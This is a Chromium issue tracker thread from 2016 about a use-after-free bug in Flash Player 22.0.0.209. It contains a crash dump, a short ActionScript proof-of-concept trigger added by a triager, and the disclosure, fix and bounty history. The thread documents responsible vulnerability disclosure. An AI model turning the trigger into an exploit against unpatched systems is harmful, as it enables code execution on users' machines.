Security: use-after-free vulnerability in flash player 22.0.0.209
Reported by
jiezengo...@gmail.com,
Jul 22 2016
|
|||||||||||||||||||||||
Issue descriptionVULNERABILITY DETAILS There is a use-after-free vulnerability in flash player. Which could lead to code execution. VERSION Flash player 22.0.0.209 in Chrome windows 7 x86(other platform should be trigger also) Please drag the test.swf into chrome will crash. Please not public in MAPP and public it in chrome issues list 14 weeks after being marked as Fixed. Credit is to "JieZeng of Tencent Zhanlu Lab". Please report it as soon as possible. chrome crash tate: 5b6583f1 e88a830500 call pepflashplayer!PPP_ShutdownBroker+0x1bf58d (5b6b0780) 5b6583f6 84c0 test al,al 5b6583f8 0f8502010000 jne pepflashplayer!PPP_ShutdownBroker+0x16730d (5b658500) 5b6583fe 8b450c mov eax,dword ptr [ebp+0Ch] 5b658401 8b581c mov ebx,dword ptr [eax+1Ch] 5b658404 83bbfc00000002 cmp dword ptr [ebx+0FCh],2 ds:0023:000000fc=???????? 3:037> r eax=0250a1a0 ebx=00000000 ecx=00000000 edx=02706000 esi=00000000 edi=0250a1a0 eip=5b658404 esp=0024d240 ebp=0024d450 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 pepflashplayer!PPP_ShutdownBroker+0x167211: 5b658404 83bbfc00000002 cmp dword ptr [ebx+0FCh],2 ds:0023:000000fc=???????? 3:037> dd eax 0250a1a0 0250a560 00000000 00000000 00000000 0250a1b0 00000000 00000000 00000000 00000000 0250a1c0 00000000 00000000 00000000 00000000 0250a1d0 00000000 00000000 00000000 00000000 0250a1e0 00000000 00000000 00000000 00000000
,
Jul 23 2016
Thanks for reporting this! I'll report it to Adobe shortly.
Adding an approximate ActionScript PoC for this issue, since one wasn't included in the bug:
var m = this.createEmptyMovieClip("m", 1, 1, 2, 3, 4);
var subm = m.createEmptyMovieClip("subm", 2, 1, 2, 3, 4);
function f(){
m.removeMovieClip();
return false;
}
subm.addProperty( "focusEnabled", f, f);
Selection.setFocus( "subm");
,
Jul 23 2016
,
Jul 25 2016
,
Jul 25 2016
,
Jul 25 2016
,
Jul 26 2016
what is the PSIRT number?
,
Jul 26 2016
,
Jul 26 2016
,
Jul 29 2016
@natashenka: I want to know this issue whether have a PSIRT number? And if this issue submitted by others,please let me know as soon as possible. Thanks!
,
Jul 29 2016
Sorry to take so long to get back to you. This is PSIRT-5643, and I haven't heard from Adobe when it will be fixed yet. As far as I know, no one else has submitted this issue via the Chrome tracker. Otherwise, Adobe generally doesn't let people know whether issues submitted to them were duplicates until the issue is fixed.
,
Jul 30 2016
@natashenka That's OK! I got it.
,
Aug 11 2016
,
Sep 1 2016
,
Sep 22 2016
Hi, Fixed in Sep and what is the next program ?
,
Sep 22 2016
Marking this as fixed
,
Sep 23 2016
,
Sep 23 2016
,
Sep 25 2016
,
Sep 26 2016
Your change meets the bar and is auto-approved for M54 (branch: 2840)
,
Sep 29 2016
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible! If all merges have been completed, please remove any remaining Merge-Approved labels from this issue. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 2 2016
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible! If all merges have been completed, please remove any remaining Merge-Approved labels from this issue. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 7 2016
Nothing to merge here.
,
Oct 7 2016
,
Oct 16 2016
,
Oct 16 2016
And $3,000 for this one!
,
Oct 16 2016
,
Oct 16 2016
,
Dec 30 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by kerrnel@chromium.org
, Jul 22 2016